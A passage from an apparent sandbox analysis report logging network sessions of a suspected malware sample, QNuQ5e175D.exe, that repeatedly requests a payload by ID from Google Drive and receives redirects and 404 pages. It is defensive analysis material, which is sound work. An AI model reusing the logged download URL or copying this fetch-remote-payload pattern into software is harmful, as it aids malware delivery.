                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      49192.168.2.1150029142.250.184.2254437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:56 UTC466OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:56 UTC1844INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgT3tmaIRFHm1yhh_0CGmJlVxbmGg9hIDyCfNxN2Bo6ZSpJu1Gumg7YZpR8OOIVWciub
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:56 GMT
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-Mw7qU6iTU6ekF4mlPaJ7nQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:06:56 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 42 51 69 44 37 2d 44 71 64 4d 6b 6d 51 30 6f 73 77 4d 5f 37 69 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="BQiD7-DqdMkmQ0oswM_7iA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      50192.168.2.1150030172.217.16.1424437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:57 UTC424OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:57 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:57 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-SBrG1hvBk24RBpy5pq4hTw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      51192.168.2.1150031142.250.184.2254437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:58 UTC466OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:59 UTC1851INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgRdPOs9xyfsFG63nV1mt25njVJ_XT59WnRXpm6j5BWmyRcg7j-WzlRF_bcpyOQ-0ToSCzofaDs
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:58 GMT
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-fvE0Sq6ueHzbcP01s4468g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:06:59 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 30 6e 51 6f 51 35 51 66 34 34 6e 64 78 63 6a 6e 6b 43 39 68 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="H0nQoQ5Qf44ndxcjnkC9hQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      52192.168.2.1150032172.217.16.1424437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:59 UTC424OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:00 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:00 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-DEMSaf9hGjN3wvCSHqd9XA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      53192.168.2.1150033142.250.184.2254437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:07:00 UTC466OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:01 UTC1844INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFiumC41sDb8myeUXrsEiau_XSe-HqAGpRpVND6K19KJgQyGsrl7sLHVDgrsXjFeCFpzdRs4
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:01 GMT
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-uXGAboKZ8zEMWZ9PLcFzyQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:07:01 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 77 6d 4d 30 4d 33 78 58 5f 31 35 49 31 4d 47 34 63 48 6d 6d 67 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="wmM0M3xX_15I1MG4cHmmgg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      54192.168.2.1150034172.217.16.1424437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:07:02 UTC424OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:02 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:02 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-NIlbUPw2lLpebQ4MUKWzzg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      55192.168.2.1150035142.250.184.2254437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:07:03 UTC466OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:03 UTC1851INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgToru8h0awP8tiM2VZerbLzFWseOk7Xp5bMiH61jGOOuExvYFa1fswxOUyYIZtSt3X1xr7Rzz4
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:03 GMT
                                                      Content-Security-Policy: script-src 'nonce-SGZ1vJU3G8e20QrjM0lTJg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:07:03 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 70 75 62 4f 45 77 30 33 79 75 77 52 70 64 4c 6c 78 31 5f 4b 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="UpubOEw03yuwRpdLlx1_Kw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      56192.168.2.1150036172.217.16.1424437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:07:04 UTC424OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:04 UTC1920INHTTP/1.1 303 See Other
